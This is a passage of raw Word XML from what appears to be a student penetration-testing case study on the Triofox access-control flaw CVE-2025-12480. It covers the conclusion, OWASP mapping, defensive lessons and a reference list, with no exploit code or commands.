            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Non-allowlisted executable path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rejected or run with reduced rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>8.4  A note on the journal-only requirement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The course guidance asks that background and references rely on journal papers. That is sound for the scholarly framing: the access control, testing, and patch management literature cited here is peer-reviewed. But the specific facts of this incident, the CVE metadata, the attack chain, the patch diff, exist only in primary vendor and incident sources. Omitting them, or dressing them up as journal papers, would make the case study unverifiable or dishonest. The references below are therefore split into peer-reviewed literature and primary incident sources, each labelled for what it is.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>9  Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-12480 is a small flaw with a large consequence, and that disproportion is the lesson. One authorisation check trusted a value the attacker could set, and from that single point the UNC6485 campaign reached </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>-level code execution, deployed legitimate remote-access tooling, tunnelled RDP out of the network, and reached for Domain Admins. Nothing in the chain after the first step required a sophisticated exploit; the attacker mostly used the product's own features and signed, off-the-shelf tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Mapped to the OWASP Top 10:2025, the incident is primarily Broken Access Control (A01), with the server-side enforcement failure at its centre. It draws secondarily on Insecure Design (A06), in the trust-boundary violation and the privileged anti-virus feature, and on Security Misconfiguration (A02), in the live setup pages and unset hardening. The evidence does not support forcing it further down the list, and the analysis has resisted doing so.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Two conclusions carry beyond Triofox. First, authorisation decisions must be made from data the server observes, not data the client sends, and first-run functionality must become inert once it has served its purpose. Second, when prevention fails, as it did here, detection at a layer the attacker does not control is what bounds the damage; effective behavioural alerting turned a total compromise into a 16-minute containment. The vulnerability was patched before it was ever exploited. The organisations that were compromised were compromised by the gap between a fix being available and being applied, which is a reminder that vulnerability management is as much an operational discipline as a technical one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Peer-reviewed literature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[1]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>J. H. Saltzer and M. D. Schroeder, “The protection of information in computer systems,” Proceedings of the IEEE, vol. 63, no. 9, pp. 1278–1308, 1975.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[2]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>R. S. Sandhu and P. Samarati, “Access control: principle and practice,” IEEE Communications Magazine, vol. 32, no. 9, pp. 40–48, 1994.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[3]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X. Li and Y. Xue, “A survey on server-side approaches to securing web applications,” ACM Computing Surveys, vol. 46, no. 4, pp. 1–29, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[4]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A. Austin, C. Holmgreen, and L. Williams, “A comparison of the efficiency and effectiveness of vulnerability discovery techniques,” Information and Software Technology, vol. 55, no. 7, pp. 1279–1288, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[5]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A. Anas, S. Elgamal, and B. Youssef, “Survey on detecting and preventing web application broken access control attacks,” International Journal of Electrical and Computer Engineering, vol. 14, no. 1, pp. 772–781, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[6]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A. Santos Filho, R. J. Rodríguez, and E. L. Feitosa, “Automated broken object-level authorization attack detection in REST APIs through OpenAPI to colored Petri nets transformation,” International Journal of Information Security, vol. 24, art. 83, 2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[7]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>R. Amankwah, J. Chen, P. K. Kudjo, and D. Towey, “An empirical comparison of commercial and open-source web vulnerability scanners,” Software: Practice and Experience, vol. 50, no. 9, pp. 1842–1857, 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[8]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>W. Xiong and R. Lagerström, “Threat modeling — A systematic literature review,” Computers &amp; Security, vol. 84, pp. 53–69, 2019.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[9]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A. G. Bacudio, X. Yuan, B. T. B. Chu, and M. Jones, “An overview of penetration testing,” International Journal of Network Security &amp; Its Applications, vol. 3, no. 6, pp. 19–38, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Primary incident and standards sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[10]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>S. D’Souza, P. DSouza, B. Glynn, K. O’Flynn, and Y. Gupta, “No place like localhost: Unauthenticated remote access via Triofox vulnerability CVE-2025-12480,” Mandiant / Google Cloud Threat Intelligence, 10 Nov. 2025. https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[11]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Mandiant, “MNDT-2025-0008: Triofox improper access control,” Vulnerability Disclosures, 2025. https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2025/MNDT-2025-0008.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[12]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MITRE, “CVE-2025-12480,” CVE Record. https://www.cve.org/CVERecord?id=CVE-2025-12480</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[13]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Rapid7, “CVE-2025-12480 (Triofox / CentreStack) analysis,” Rapid7 Blog, 2026. https://www.rapid7.com/blog/post/ra-cve-2025-12480-analysis/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[14]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Gladinet, “Triofox releases history.” https://access.triofox.com/releases_history/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[15]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP Foundation, “OWASP Top 10:2025,” 2025. https://top10.owasp.org/2025/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[16]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CISA, “Known Exploited Vulnerabilities Catalog.” https://www.cisa.gov/known-exploited-vulnerabilities-catalog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Evidence tiers used in this report: [documented] fact from a primary source; [interpretation] the author's analysis; [proposed] testing not performed. No production Triofox system was accessed or tested.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:headerReference w:type="default" r:id="rId10"/>
      <w:footerReference w:type="default" r:id="rId11"/>
      <w:headerReference w:type="first" r:id="rId12"/>
      <w:footerReference w:type="first" r:id="rId13"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1361" w:right="1361" w:bottom="1247" w:left="1361"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atin Modern Roman" w:hAnsi="Latin Modern Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:color w:val="737373"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t>BCSE319L — Penetration Testing and Vulnerability Analysis</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184" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:color w:val="737373"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t>CVE-2025-12480: Broken Access Control to RCE in Gladinet Triofox</w:t>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:color w:val="737373"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>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jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>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 Id="rId15"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